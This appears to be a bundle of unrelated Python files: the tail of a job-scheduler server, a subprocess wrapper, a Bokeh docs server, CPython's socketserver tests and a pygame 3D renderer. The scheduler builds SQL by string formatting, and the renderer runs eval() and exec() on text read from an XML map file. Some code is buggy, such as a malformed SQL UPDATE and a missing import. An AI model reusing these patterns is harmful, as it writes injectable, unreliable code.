time.sleep(self._interval)
data = mq_client.get(queue)
if data:
self._logger.info("Recieve queue: {}".format(data))
try:
self._handle_queue(conn, data)
except Exception as e:
self._logger.error(f"Error while _handle_queue: {e}")
continue
if self._status == define.STATUS_STOPPED:
self._logger.info("Server has been stopped")
continue
# assign jobs
self._assign_jobs(conn)
def _handle_queue(self, conn, data):
title = data["title"]
body = data["body"]
self._logger.debug(
"handle_queue > title: {}, body: {}".format(title, body))
self._notice.send_task(
"notice",
kwargs={
"level": "INFO",
"msg": "handle_queue > title: {}, body: {}".format(title, body)}
)
if title == "server":
cmd = body.get("command", None)
by = body.get("by", "undefined")
if cmd == "terminate":
self._logger.info(f"Server is terminated by {by}")
self._set_status(define.STATUS_TERMINATED)
elif cmd == "stop":
self._set_status(define.STATUS_STOPPED)
self._logger.info(f"Server is stopped by {by}")
elif cmd == "resume":
self._set_status(define.STATUS_RUNNING)
self._logger.info(f"Server is resumed by {by}")
else:
self._logger.info(f"Undefined {title} command {by}: {cmd}")
elif title == "schedule":
cmd = body.get("command", None)
if cmd == "insert":
date = body["date"]
assert isinstance(date, str)
try:
schedule.dump_schedule_hist(conn)
schedule.generate_schedule(conn, date)
conn.commit()
except Exception as e:
conn.rollback()
self._logger.error(
"Error while generating schedule: {}".format(e))
else:
self._logger.warn(f"Undefined {title} command: {cmd}")
else:
raise ValueError(f"Undefined title: {title}")
def _assign_jobs(self, conn):
# commit for getting up-to-date db status
conn.commit()
# assign jobs
jobs = schedule.get_assignable_jobs(conn)
if not len(jobs):
self._logger.debug("There is no assignable jobs")
return
try:
for row in jobs:
self._logger.info(f"Assign job: {row[1]}")
task_id = self._worker.send_task("script", [row[1]])
conn.execute(
f"""
UPDATE job_schedule
SET job_status=1, task_id='{task_id}', run_count=run_count+1, assign_time=now()
WHERE jid={row[0]};
"""
)
conn.commit()
except Exception as e:
self._logger.error(e)
conn.rollback()
self._notice.send_task(
"notice",
kwargs={
"level": "ERROR",
"msg": "Error while assign_jobs: {}".format(e)
})
def _update_result(self):
"""
thread for updating result
"""
self._logger.debug("update_result thread has been started")
conn = MySQLClient()
conn.init(**self._config_common["mysql"])
is_first = True
while True:
# time interval from second loop
if is_first is True:
is_first = False
else:
time.sleep(self._interval)
if self._status == define.STATUS_TERMINATED:
self._logger.debug("update_result thread has been terminated")
break
elif self._status == define.STATUS_STOPPED:
self._logger.debug("update_result thread has been stopped")
continue
# commit for getting up-to-date db status
conn.commit()
# get finished jobs
data = conn.fetchall(
"""
SELECT jid, task_id, job_status from job_schedule where task_id IS NOT NULL;
"""
)
if not len(data):
self._logger.debug("No data to update result")
continue
# update job_status and task_id=NULL
sql_list = list()
for row in data:
job_id = row[0]
task_id = row[1]
job_status = row[2]
result = self._worker.AsyncResult(task_id)
state = result.state
self._logger.info("Result: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status))
if result.ready():
if state == "REVOKED":
sql_list.append("""
update job_schedule set job_status=-9, task_id=NULL where jid={};
""".format(job_id)
)
elif state in ["STARTED", "SUCCESS"]:
result_code = result.get()
if result_code == 0:
self._notice.send_task(
"notice",
kwargs={
"level": "INFO",
"msg": "Job finished: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status)
})
job_status = 99
else:
self._notice.send_task(
"notice",
kwargs={
"level": "ERROR",
"msg": "Result: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status)
})
job_status = -result_code
sql_list.append("""
update job_schedule set job_status={}, task_id=NULL where jid={};
""".format(job_status, job_id)
)
elif state == "FAILURE":
self._notice.send_task(
"notice",
kwargs={
"level": "CRITICAL",
"msg": "Result: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status)
})
sql_list.append("""
update job_schedule set job_status=-999 and task_id=NULL where jid={};
""".format(job_id)
)
else:
self._logger.error(
"Unexpected ready status: {}".format(state))
elif state == "STARTED":
if job_status == 1:
sql_list.append("""
update job_schedule set job_status=2 where jid={};
""".format(job_id)
)
elif state == "PENDING":
continue
elif state == "FAILURE":
self._notice.send_task(
"notice",
kwargs={
"level": "CRITICAL",
"msg": "Result: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status)
})
sql_list.append("""
update job_schedule set job_status=-999 and task_id=NULL where jid={};
""".format(job_id)
)
else:
self._logger.error("Unexpected status: {}".format(state))
self._notice.send_task(
"notice",
kwargs={
"level": "CRITICAL",
"msg": "Result: state({}), jid({}), task_id({}), job_status({})".format(
state, job_id, task_id, job_status)
})
# nothing to proceed
if len(sql_list):
self._logger.info("sql_list: {}".format(sql_list))
try:
for sql in sql_list:
conn.execute(sql)
conn.commit()
except Exception as e:
self._logger.error(e)
conn.rollback()
if __name__ == "__main__":
env_dict = parse_env()
configs = parse_config(env_dict["MODE"])
configs["env"] = env_dict
option = parse_arguments()
server = Server(configs=configs)
server.start()
|
conc.py
|
""" Helpers for concurrency and threading stuff. """
import threading
def simple_thread(func, daemon=True):
""" Start function in another thread, discarding return value. """
thread = threading.Thread(target=func)
thread.daemon = daemon
thread.start()
return thread
|
command.py
|
"""
Copyright (c) 2019-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import signal
import subprocess
import sys
import threading
import time
import os
class Command:
def __init__(self, cmd, path=None):
self.cmd = cmd
self.process = None
self.exec_time = -1
self.output = [] # store output here
self.kwargs = {}
self.timeout = False
self.path = path
# set system/version dependent "start_new_session" analogs
if sys.platform == "win32":
self.kwargs.update(creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
elif sys.version_info < (3, 2): # assume posix
self.kwargs.update(preexec_fn=os.setsid)
else: # Python 3.2+ and Unix
self.kwargs.update(start_new_session=True)
def kill_process_tree(self, pid):
try:
if sys.platform != "win32":
os.killpg(pid, signal.SIGKILL)
else:
subprocess.call(['taskkill', '/F', '/T', '/PID', str(pid)])
except OSError as err:
print(err)
def run(self, timeout=3600, assert_returncode_zero=True):
def target():
start_time = time.time()
with subprocess.Popen(self.cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True,
bufsize=1, cwd=self.path, **self.kwargs) as p:
self.process = p
self.timeout = False
self.output = []
for line in self.process.stdout:
line = line.decode('utf-8')
self.output.append(line)
sys.stdout.write(line)
sys.stdout.flush()
self.process.stdout.close()
self.process.wait()
self.exec_time = time.time() - start_time
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
try:
print("Error: process taking too long to complete--terminating" + ", [ " + self.cmd + " ]")
self.kill_process_tree(self.process.pid)
self.exec_time = timeout
self.timeout = True
thread.join()
except OSError as e:
print(self.process.pid, "Exception when try to kill task by PID, " + e.strerror)
raise
returncode = self.process.wait()
print("Process returncode = " + str(returncode))
if assert_returncode_zero:
assert returncode == 0, "Process exited with a non-zero exit code {}; output:{}".format(
returncode,
"".join(self.output))
return returncode
def get_execution_time(self):
return self.exec_time
|
conftest.py
|
import pytest
import server
from multiprocessing import Process
@pytest.fixture(scope='session', autouse=True)
def server_setup():
instance = server.create_server()
process = Process(target=instance.serve_forever)
process = Process(target=instance.serve_forever)
process.daemon = True
process.start()
|
docserver.py
|
from __future__ import print_function
import flask
import os
import sys
import threading
import time
import webbrowser
import tornado
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
_basedir = os.path.join("..", os.path.dirname(__file__))
app = flask.Flask(__name__, static_path="/unused")
PORT=5009
http_server = HTTPServer(WSGIContainer(app))
@app.route('/')
def welcome():
return """
<h1>Welcome to the Bokeh documentation server</h1>
You probably want to go to <a href="/en/latest/index.html"> Index</a>
"""
@app.route('/en/latest/<path:filename>')
def send_pic(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/"), filename)
@app.route('/scripts/<path:filename>')
def send_script(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/scripts/"), filename)
def open_browser():
# Child process
time.sleep(0.5)
webbrowser.open("http://localhost:%d/en/latest/index.html" % PORT, new="tab")
data = {}
def serve_http():
data['ioloop'] = IOLoop()
http_server.listen(PORT)
IOLoop.instance().start()
def shutdown_server():
ioloop = data['ioloop']
ioloop.add_callback(ioloop.stop)
print("Asked Server to shut down.")
def ui():
try:
time.sleep(0.5)
input("Press <ENTER> to exit...\n")
except:
pass
if __name__ == "__main__":
if tornado.version_info[0] == 4:
print('docserver.py script requires tornado 5 or higher')
sys.exit(1)
print("\nStarting Bokeh plot server on port %d..." % PORT)
print("Visit http://localhost:%d/en/latest/index.html to see plots\n" % PORT)
t_server = threading.Thread(target=serve_http)
t_server.start()
t_browser = threading.Thread(target=open_browser)
t_browser.start()
ui()
shutdown_server()
t_server.join()
t_browser.join()
print("Server shut down.")
|
test_socketserver.py
|
"""
Test suite for socketserver.
"""
import contextlib
import io
import os
import select
import signal
import socket
import tempfile
import threading
import unittest
import socketserver
import test.support
from test.support import reap_children, verbose
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
test.support.requires("network")
TEST_STR = b"hello world\n"
HOST = socket_helper.HOST
HAVE_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
requires_unix_sockets = unittest.skipUnless(HAVE_UNIX_SOCKETS,
'requires Unix sockets')
HAVE_FORKING = test.support.has_fork_support
requires_forking = unittest.skipUnless(HAVE_FORKING, 'requires forking')
def signal_alarm(n):
"""Call signal.alarm when it exists (i.e. not on Windows)."""
if hasattr(signal, 'alarm'):
signal.alarm(n)
# Remember real select() to avoid interferences with mocking
_real_select = select.select
def receive(sock, n, timeout=test.support.SHORT_TIMEOUT):
r, w, x = _real_select([sock], [], [], timeout)
if sock in r:
return sock.recv(n)
else:
raise RuntimeError("timed out on %r" % (sock,))
if HAVE_UNIX_SOCKETS and HAVE_FORKING:
class ForkingUnixStreamServer(socketserver.ForkingMixIn,
socketserver.UnixStreamServer):
pass
class ForkingUnixDatagramServer(socketserver.ForkingMixIn,
socketserver.UnixDatagramServer):
pass
@contextlib.contextmanager
def simple_subprocess(testcase):
"""Tests that a custom child process is not waited on (Issue 1540386)"""
pid = os.fork()
if pid == 0:
# Don't raise an exception; it would be caught by the test harness.
os._exit(72)
try:
yield None
except:
raise
finally:
test.support.wait_process(pid, exitcode=72)
class SocketServerTest(unittest.TestCase):
"""Test all socket servers."""
def setUp(self):
signal_alarm(60) # Kill deadlocks after 60 seconds.
self.port_seed = 0
self.test_files = []
def tearDown(self):
signal_alarm(0) # Didn't deadlock.
reap_children()
for fn in self.test_files:
try:
os.remove(fn)
except OSError:
pass
self.test_files[:] = []
def pickaddr(self, proto):
if proto == socket.AF_INET:
return (HOST, 0)
else:
# XXX: We need a way to tell AF_UNIX to pick its own name
# like AF_INET provides port==0.
dir = None
fn = tempfile.mktemp(prefix='unix_socket.', dir=dir)
self.test_files.append(fn)
return fn
def make_server(self, addr, svrcls, hdlrbase):
class MyServer(svrcls):
def handle_error(self, request, client_address):
self.close_request(request)
raise
class MyHandler(hdlrbase):
def handle(self):
line = self.rfile.readline()
self.wfile.write(line)
if verbose: print("creating server")
try:
server = MyServer(addr, MyHandler)
except PermissionError as e:
# Issue 29184: cannot bind() a Unix socket on Android.
self.skipTest('Cannot create server (%s, %s): %s' %
(svrcls, addr, e))
self.assertEqual(server.server_address, server.socket.getsockname())
return server
@threading_helper.reap_threads
def run_server(self, svrcls, hdlrbase, testfunc):
server = self.make_server(self.pickaddr(svrcls.address_family),
svrcls, hdlrbase)
# We had the OS pick a port, so pull the real address out of
# the server.
addr = server.server_address
if verbose:
print("ADDR =", addr)
print("CLASS =", svrcls)
t = threading.Thread(
name='%s serving' % svrcls,
target=server.serve_forever,
# Short poll interval to make the test finish quickly.
# Time between requests is short enough that we won't wake
# up spuriously too many times.
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
t.start()
if verbose: print("server running")
for i in range(3):
if verbose: print("test client", i)
testfunc(svrcls.address_family, addr)
if verbose: print("waiting for server")
server.shutdown()
t.join()
server.server_close()
self.assertEqual(-1, server.socket.fileno())
if HAVE_FORKING and isinstance(server, socketserver.ForkingMixIn):
# bpo-31151: Check that ForkingMixIn.server_close() waits until
# all children completed
self.assertFalse(server.active_children)
if verbose: print("done")
def stream_examine(self, proto, addr):
with socket.socket(proto, socket.SOCK_STREAM) as s:
s.connect(addr)
s.sendall(TEST_STR)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
def dgram_examine(self, proto, addr):
with socket.socket(proto, socket.SOCK_DGRAM) as s:
if HAVE_UNIX_SOCKETS and proto == socket.AF_UNIX:
s.bind(self.pickaddr(proto))
s.sendto(TEST_STR, addr)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
def test_TCPServer(self):
self.run_server(socketserver.TCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_ThreadingTCPServer(self):
self.run_server(socketserver.ThreadingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_forking
def test_ForkingTCPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_UnixStreamServer(self):
self.run_server(socketserver.UnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_ThreadingUnixStreamServer(self):
self.run_server(socketserver.ThreadingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixStreamServer(self):
with simple_subprocess(self):
self.run_server(ForkingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_UDPServer(self):
self.run_server(socketserver.UDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
def test_ThreadingUDPServer(self):
self.run_server(socketserver.ThreadingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_forking
def test_ForkingUDPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_UnixDatagramServer(self):
self.run_server(socketserver.UnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_ThreadingUnixDatagramServer(self):
self.run_server(socketserver.ThreadingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixDatagramServer(self):
self.run_server(ForkingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@threading_helper.reap_threads
def test_shutdown(self):
# Issue #2302: shutdown() should always succeed in making an
# other thread leave serve_forever().
class MyServer(socketserver.TCPServer):
pass
class MyHandler(socketserver.StreamRequestHandler):
pass
threads = []
for i in range(20):
s = MyServer((HOST, 0), MyHandler)
t = threading.Thread(
name='MyServer serving',
target=s.serve_forever,
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
threads.append((t, s))
for t, s in threads:
t.start()
s.shutdown()
for t, s in threads:
t.join()
s.server_close()
def test_close_immediately(self):
class MyServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
server = MyServer((HOST, 0), lambda: None)
server.server_close()
def test_tcpserver_bind_leak(self):
# Issue #22435: the server socket wouldn't be closed if bind()/listen()
# failed.
# Create many servers for which bind() will fail, to see if this result
# in FD exhaustion.
for i in range(1024):
with self.assertRaises(OverflowError):
socketserver.TCPServer((HOST, -1),
socketserver.StreamRequestHandler)
def test_context_manager(self):
with socketserver.TCPServer((HOST, 0),
socketserver.StreamRequestHandler) as server:
pass
self.assertEqual(-1, server.socket.fileno())
class ErrorHandlerTest(unittest.TestCase):
"""Test that the servers pass normal exceptions from the handler to
handle_error(), and that exiting exceptions like SystemExit and
KeyboardInterrupt are not passed."""
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_sync_handled(self):
BaseErrorTestServer(ValueError)
self.check_result(handled=True)
def test_sync_not_handled(self):
with self.assertRaises(SystemExit):
BaseErrorTestServer(SystemExit)
self.check_result(handled=False)
def test_threading_handled(self):
ThreadingErrorTestServer(ValueError)
self.check_result(handled=True)
def test_threading_not_handled(self):
with threading_helper.catch_threading_exception() as cm:
ThreadingErrorTestServer(SystemExit)
self.check_result(handled=False)
self.assertIs(cm.exc_type, SystemExit)
@requires_forking
def test_forking_handled(self):
ForkingErrorTestServer(ValueError)
self.check_result(handled=True)
@requires_forking
def test_forking_not_handled(self):
ForkingErrorTestServer(SystemExit)
self.check_result(handled=False)
def check_result(self, handled):
with open(os_helper.TESTFN) as log:
expected = 'Handler called\n' + 'Error handled\n' * handled
self.assertEqual(log.read(), expected)
class BaseErrorTestServer(socketserver.TCPServer):
def __init__(self, exception):
self.exception = exception
super().__init__((HOST, 0), BadHandler)
with socket.create_connection(self.server_address):
pass
try:
self.handle_request()
finally:
self.server_close()
self.wait_done()
def handle_error(self, request, client_address):
with open(os_helper.TESTFN, 'a') as log:
log.write('Error handled\n')
def wait_done(self):
pass
class BadHandler(socketserver.BaseRequestHandler):
def handle(self):
with open(os_helper.TESTFN, 'a') as log:
log.write('Handler called\n')
raise self.server.exception('Test error')
class ThreadingErrorTestServer(socketserver.ThreadingMixIn,
BaseErrorTestServer):
def __init__(self, *pos, **kw):
self.done = threading.Event()
super().__init__(*pos, **kw)
def shutdown_request(self, *pos, **kw):
super().shutdown_request(*pos, **kw)
self.done.set()
def wait_done(self):
self.done.wait()
if HAVE_FORKING:
class ForkingErrorTestServer(socketserver.ForkingMixIn, BaseErrorTestServer):
pass
class SocketWriterTest(unittest.TestCase):
def test_basics(self):
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.wfile = self.wfile
self.server.wfile_fileno = self.wfile.fileno()
self.server.request_fileno = self.request.fileno()
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
s = socket.socket(
server.address_family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
with s:
s.connect(server.server_address)
server.handle_request()
self.assertIsInstance(server.wfile, io.BufferedIOBase)
self.assertEqual(server.wfile_fileno, server.request_fileno)
def test_write(self):
# Test that wfile.write() sends data immediately, and that it does
# not truncate sends when interrupted by a Unix signal
pthread_kill = test.support.get_attribute(signal, 'pthread_kill')
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.sent1 = self.wfile.write(b'write data\n')
# Should be sent immediately, without requiring flush()
self.server.received = self.rfile.readline()
big_chunk = b'\0' * test.support.SOCK_MAX_SIZE
self.server.sent2 = self.wfile.write(big_chunk)
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
interrupted = threading.Event()
def signal_handler(signum, frame):
interrupted.set()
original = signal.signal(signal.SIGUSR1, signal_handler)
self.addCleanup(signal.signal, signal.SIGUSR1, original)
response1 = None
received2 = None
main_thread = threading.get_ident()
def run_client():
s = socket.socket(server.address_family, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
with s, s.makefile('rb') as reader:
s.connect(server.server_address)
nonlocal response1
response1 = reader.readline()
s.sendall(b'client response\n')
reader.read(100)
# The main thread should now be blocking in a send() syscall.
# But in theory, it could get interrupted by other signals,
# and then retried. So keep sending the signal in a loop, in
# case an earlier signal happens to be delivered at an
# inconvenient moment.
while True:
pthread_kill(main_thread, signal.SIGUSR1)
if interrupted.wait(timeout=float(1)):
break
nonlocal received2
received2 = len(reader.read())
background = threading.Thread(target=run_client)
background.start()
server.handle_request()
background.join()
self.assertEqual(server.sent1, len(response1))
self.assertEqual(response1, b'write data\n')
self.assertEqual(server.received, b'client response\n')
self.assertEqual(server.sent2, test.support.SOCK_MAX_SIZE)
self.assertEqual(received2, test.support.SOCK_MAX_SIZE - 100)
class MiscTestCase(unittest.TestCase):
def test_all(self):
# objects defined in the module should be in __all__
expected = []
for name in dir(socketserver):
if not name.startswith('_'):
mod_object = getattr(socketserver, name)
if getattr(mod_object, '__module__', None) == 'socketserver':
expected.append(name)
self.assertCountEqual(socketserver.__all__, expected)
def test_shutdown_request_called_if_verify_request_false(self):
# Issue #26309: BaseServer should call shutdown_request even if
# verify_request is False
class MyServer(socketserver.TCPServer):
def verify_request(self, request, client_address):
return False
shutdown_called = 0
def shutdown_request(self, request):
self.shutdown_called += 1
socketserver.TCPServer.shutdown_request(self, request)
server = MyServer((HOST, 0), socketserver.StreamRequestHandler)
s = socket.socket(server.address_family, socket.SOCK_STREAM)
s.connect(server.server_address)
s.close()
server.handle_request()
self.assertEqual(server.shutdown_called, 1)
server.server_close()
def test_threads_reaped(self):
"""
In #37193, users reported a memory leak
due to the saving of every request thread. Ensure that
not all threads are kept forever.
"""
class MyServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
server = MyServer((HOST, 0), socketserver.StreamRequestHandler)
for n in range(10):
with socket.create_connection(server.server_address):
server.handle_request()
self.assertLess(len(server._threads), 10)
server.server_close()
if __name__ == "__main__":
unittest.main()
|
main.py
|
import sys, pygame, math,time,numpy,re
from hashlib import sha1
import xml.etree.ElementTree as ET
pygame.init()
pygame.font.init()
def cthread(func,args):
t = Process(target = func, args = args)
t.start()
def calculate_circle_points(x, y, r):
points = []
for i in range(-r, r + 1):
s = math.sqrt(abs((x + i)**2 - r**2))
points.append([x + i, s])
if s != 0:
points.append([x + i, -s])
return points
#drawing
def draw_point(point):
try:
screen.blit(hash, (round(point[0] + width / 2), round(point[1] + height / 2)))
except TypeError:
pass
def calculate_2d_point(point, camera = [0,0,0], f = 1000): #The holy grail lmao
try:
if point[2] - camera[2] >= 0:
x = ((point[0] - camera[0]) * (f / (point[2] - camera[2]))) + camera[0]
y = ((point[1] - camera[1]) * (f / (point[2] - camera[2]))) + camera[1]
else:
x = -10000
y = -10000
except ZeroDivisionError: #TODO: fix this lmao
x = -10000
y = -10000
return x, y
def compute_rotate(r,p,y):
cosa = math.cos(y)
sina = math.sin(y)
cosb = math.cos(p)
sinb = math.sin(p)
cosc = math.cos(r)
sinc = math.sin(r)
Axx = cosa*cosb
Axy = cosa*sinb*sinc - sina*cosc
Axz = cosa*sinb*cosc + sina*sinc
Ayx = sina*cosb
Ayy = sina*sinb*sinc + cosa*cosc
Ayz = sina*sinb*cosc - cosa*sinc
Azx = -sinb
Azy = cosb*sinc
Azz = cosb*cosc
return (Axx, Axy, Axz, Ayx, Ayy, Ayz, Azx, Azy, Azz)
def rotate_point(point,origin, r_vars):
Axx, Axy, Axz, Ayx, Ayy, Ayz, Azx, Azy, Azz = r_vars
res = []
px = point[0]
py = point[1]
pz = point[2]
#transform to origin
px -= origin[0]
py -= origin[1]
pz -= origin[2]
#rotate
res = [Axx*px + Axy*py + Axz*pz,Ayx*px + Ayy*py + Ayz*pz,Azx*px + Azy*py + Azz*pz]
#transform back
res[0] += origin[0]
res[1] += origin[1]
res[2] += origin[2]
return res
def full_process_point(point, rorigin,r_vars,c_vars): #Compute rotate first!
global camera
point = rotate_point(point,rorigin,r_vars)
point = rotate_point(point,camera,c_vars)
point = calculate_2d_point(point, camera)
return point
#draw_point(point)
def calculate_cube(x, y, z, x1, y1, z1, pitch, roll, yaw):
it_x = x1 - x
it_y = y1 - y
it_z = z1 - z
mid_x = (x1 + x) / 2
mid_y = (y1 + y) / 2
mid_z = (z1 + z) / 2
mid = [mid_x, mid_y, mid_z]
r_vars = compute_rotate(pitch, roll, yaw) #Prepare rotation
c_vars = compute_rotate(camera_facing[1] * math.pi/180,camera_facing[0] * math.pi/180,0) #Prepare camera rotation
points = []
for ix in range(x, x1+1):
for iz in range(z, z1+1):
points.append([ix,y,iz])
points.append([ix,y1,iz])
for iz in range(z, z1+1):
for iy in range(y, y1+1):
points.append([x,iy,iz])
points.append([x1,iy,iz])
for ix in range(x, x1+1):
for iy in range(y, y1+1):
points.append([ix,iy,z])
points.append([ix,iy,z1])
for i in range(len(points)):
points[i] = full_process_point(points[i],mid,r_vars,c_vars)
return points
def calculate_sphere(x, y, z, r, pitch, roll, yaw):
#TODO: Improve algo
#Algo right now ->
# Calculate circles sequetially
r_vars = compute_rotate(pitch, roll, yaw) #Prepare rotation
c_vars = compute_rotate(camera_facing[1] * math.pi/180,camera_facing[0] * math.pi/180,0) #Prepare camera rotation
points = []
for ir in range(-r,r+1):
p = calculate_circle_points(0, 0, round(math.sqrt(r**2 - ir**2)))
for point in p:
points.append([point[0]+x, point[1]+y, z + ir])
points.append([point[0]+x, y+ir, z + point[1]])
for i in range(len(points)):
points[i] = full_process_point(points[i],[x,y,z],r_vars,c_vars)
return points
def calculate_pyramid():
pass
def read_map_xml(filename): # {id:[objecttype,calculatedhash,[params],points,isanimated,anim]}
result = {}
portals = {}
rel_objects = {}
file = open(filename,'r')
data = file.read()
file.close()
root = ET.fromstring(data)
for child1 in root:
if child1.tag == 'objects':
for child2 in child1:
if child2.attrib['id'] == 'auto':
child2.attrib['id'] = str(int(list(rel_objects.keys())[-1]) + 1)
if child2.tag == 'cube':
params = {}
object_variables[child2.attrib['id']] = {}
for attrib in child2:
if attrib.attrib['type'] == 'eval':
params[attrib.tag] = eval(attrib.text)
elif attrib.attrib['type'] == 'str':
params[attrib.tag] = attrib.text
elif attrib.attrib['type'] == 'rel':
parse = attrib.text
data = re.findall(r'{.*}\[\w*\]',parse)
for d in data:
rel_id = d.replace('{','').replace('}',' ').replace('[','').replace(']','').split(' ')
if rel_id[0].startswith('self'):
rel_id[0] = eval(rel_id[0].replace('self',child2.attrib['id']))
parse = parse.replace(d, str(rel_objects[str(rel_id[0])][str(rel_id[1])]))
params[attrib.tag] = eval(parse)
else:
params[attrib.tag] = eval('{}({})'.format(attrib.attrib['type'],attrib.text))
if 'animate' in params:
isanimated = True
id = child2.attrib['id']
anim = params['animate']
exec(params['animate_init'])
else:
isanimated = False
anim = ''
funcparams = [params['x'],params['y'],params['z'],params['x1'],params['y1'],params['z1'],params['pitch'],params['roll'],params['yaw']]
rel_objects[child2.attrib['id']] = params
result[child2.attrib['id']] = ['cube',None,funcparams,[],isanimated,anim]
for o,v in rel_objects.items():
#print(o)
pass
if child2.tag == 'sphere':
params = {}
object_variables[child2.attrib['id']] = {}
for attrib in child2:
if attrib.attrib['type'] == 'eval':
params[attrib.tag] = eval(attrib.text)
elif attrib.attrib['type'] == 'str':
params[attrib.tag] = attrib.text
elif attrib.attrib['type'] == 'rel':
parse = attrib.text
data = re.findall(r'{.*}\[\w*\]',parse)
for d in data:
rel_id = d.replace('{','').replace('}',' ').replace('[','').replace(']','').split(' ')
if rel_id[0].startswith('self'):
rel_id[0] = eval(rel_id[0].replace('self',child2.attrib['id']))
parse = parse.replace(d, str(rel_objects[str(rel_id[0])][str(rel_id[1])]))
params[attrib.tag] = eval(parse)
else:
params[attrib.tag] = eval('{}({})'.format(attrib.attrib['type'],attrib.text))
if 'animate' in params:
isanimated = True
id = child2.attrib['id']
anim = params['animate']
exec(params['animate_init'])
else:
isanimated = False
anim = ''
funcparams = [params['x'],params['y'],params['z'],params['r'],params['pitch'],params['roll'],params['yaw']]
result[child2.attrib['id']] = ['sphere',None,funcparams,[],isanimated,anim]
elif child1.tag == 'misc':
for child2 in child1:
if child2.tag == 'portal':
if child2.attrib['id'] not in portals:
portals[child2.attrib['id']] = []
params = {}
for attrib in child2:
if attrib.attrib['type'] == 'eval':
params[attrib.tag] = eval(attrib.text)
elif attrib.attrib['type'] == 'str':
params[attrib.tag] = attrib.text
elif attrib.attrib['type'] == 'rel':
parse = attrib.text
data = re.findall(r'{.*}\[\w*\]',parse)
for d in data:
rel_id = d.replace('{','').replace('}',' ').replace('[','').replace(']','').split(' ')
if rel_id[0].startswith('self'):
rel_id[0] = eval(rel_id[0].replace('self',child2.attrib['id']))
parse = parse.replace(d, str(rel_objects[str(rel_id[0])][str(rel_id[1])]))
params[attrib.tag] = eval(parse)
else:
params[attrib.tag] = eval('{}({})'.format(attrib.attrib['type'],attrib.text))
portals[child2.attrib['id']].append(params)
return result, portals
def get_calculate_hash():
global camera, camera_facing
res = ''
for x in camera:
res += str(x)
for x in camera_facing:
res += str(x)
return sha1(res.encode('utf-8')).hexdigest()
def process_all_points(data):
for point in data:
draw_point(point)
def main():
global object_variables
black = 0, 0, 0
size = width, height = 1000,700
screen = pygame.display.set_mode(size)
hash = pygame.image.load("#.png")
menu_img = pygame.image.load("menu.png")
clock = pygame.time.Clock()
camera = [0,0,0]
camera_facing = [0, 0] #lr ud
r = 0
myfont = pygame.font.SysFont('Lucida', 20)
posa = [0,0,0,30,30,0]
object_variables = {}
objects, portals = read_map_xml('map.xml')
c = 90
menu = False
settings = {'updown':False}
yes = (0, 255, 0)
no = (255, 0, 0)
globals().update(locals())
while True:
dt = clock.tick(100)
print('x: {} y: {} z: {} alpha: {}'.format(round(camera[0]),round(camera[1]),round(camera[2]),round(camera_facing[0])),end = ' \r')
textsurface = myfont.render('FPS: ' + str(round(clock.get_fps(),1)), False, (255, 0, 0))
for event in pygame.event.get():
if event.type == pygame.QUIT: sys.exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE: menu = not menu
keys=pygame.key.get_pressed()
if keys[pygame.K_w]:
camera[2] += 2 * math.sin((camera_facing[0] + c) * math.pi/180) * dt / 50
camera[0] += 2 * math.cos((camera_facing[0] + c) * math.pi/180) * dt / 50
if keys[pygame.K_a]:
camera[2] -= 2 * math.sin((camera_facing[0]) * math.pi/180) * dt / 50
